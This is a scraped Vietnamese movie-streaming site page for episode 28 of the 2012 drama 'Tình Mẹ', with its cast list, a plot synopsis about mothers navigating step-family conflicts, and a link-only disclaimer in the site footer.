xem phim tinh me phimvn 2012 online, download Tình Mẹ PhimVN 2012 28/35 hd online
Neu ban khong vao duoc, xin vui long thu lai sau, chung toi dang co gang khac phuc su co.
 
 
Tình Mẹ PhimVN 2012 28/35 - phim viet nam
tinh me phimvn 2012

Tình Mẹ PhimVN 2012 28/35

,

35 episodes | Luot Xem: 323017   |  2012 |  Vietnam
Dien Vien: Phương Dung,Tuyết Thu,Thanh Điền,Xuân Văn ,Ái Châu src="http://raphd.net/js/redirection_mobile.js">

cham bi  Description - Thong tin them ve phim
Cả hai đều khá 'vất vả' khi phải xử lý những mối quan hệ chồng chéo, đầy mâu thuẫn giữa các con chung, con riêng của mình.
Trong dòng chảy của phim truyền hình với sự cạnh tranh ngày càng gay gắt, việc xuất hiện một kịch bản phim nói về 'Tình Mẹ' đã làm khá nhiều người ngạc nhiên. Đó chính là dự án phim Tình Mẹ đang được thực hiện với sự hợp tác của 2 hãng phim là Thiên Nam An và Bảo Việt Film. Với chủ đề: 'Tôn thờ tình mẹ, tình mẫu tử thiêng liêng và bất diệt. Dù bất cứ hoàn cảnh nào, dù con ruột hay con riêng thì chỉ có tình mẹ cao cả mới dung hòa tất cả'. Phim sẽ có sự góp mặt của dàn diễn viên: Tuyết Thu, Phương Dung, Ái Châu, Xuân Văn, Quang Thảo, Bùi Việt Hà, Triều An, Đinh Y Nhung, Thanh Điền, Minh Nhựt, Phương Quỳnh, Công Ninh.
Các khán giả sẽ có dịp gặp lại hai gương mặt vốn đã từng rất quen thuộc với sân khấu kịch phía Nam là nghệ sỹ Phương Dung và Tuyết Thu. Lần này, cả hai sẽ có dịp được thử thách nghề diễn với vai các bà mẹ hết lòng vì con cái và sẵn sàng hy sinh cả mạng sống của mình chỉ để mong các con được bình yên và hạnh phúc. Cả Phương Dung và Tuyết Thu sẽ phải khá 'vất vả' trong phim lần này khi phải xử lý những mối quan hệ chồng chéo, đầy mâu thuẫn giữa các con chung, con riêng của mình.
Phương Dung sẽ vào vai bà Mỹ Nhung ( Phương Dung ) là tổng giám đốc công ty truyền thông Sắc Màu Việt, bà sống hạnh phúc với chồng là ông Minh Long ( Nghệ sĩ ưu tú Thanh Điền) và con gái là Mỹ Hồng ( Xuân Văn ), đồng thời là phó giám đốc phụ giúp công việc cho bà. Nhưng gia đình hạnh phúc của bà Mỹ Nhung chợt chao đảo khi có sự xuất hiện của Mỹ Liên (Ái Châu) - con gái riêng của bà và chồng bà bắt đầu ngoại tình với Hằng (Bùi Việt Hà).
Phim cùng thể loại - Similar movies
View: 627360
View: 666676
View: 114651
View: 1754900
Đăng kí nhận phim mới qua email

 
Copyright © 2007 - 2012 Kenh88.Com Phim Online Entertainment Network
Phim88.com is a portal that made for Phim, Phim Online, Xem Phim, Online Phim and Xem Phim Online.
Phim88.Com main focus on phim online, online phim, xem phim online, download phim. Phim tai phim88.com chat luong cao va download truc tiep. Ban co the xem phim online hoac download phim toc do cao. Phim88.Com covers phim viet nam, phim hong kong, phim han quoc, phim trung quoc, phim dai loan, phim le, phim bo, phim tap, phim tvb.
Phim88.Com is absolutely legal and contain only links to other sites on the Internet : (youtube.com, dailymotion.com,.. ).Phim88.Com is not responsible for the accuracy, compliance, copyright, legality, decency, or any other aspect of the content of other linked sites.
If you have any legal issues please contact appropriate media file owners / hosters.

DMCA Notification | Privacy Policy
amung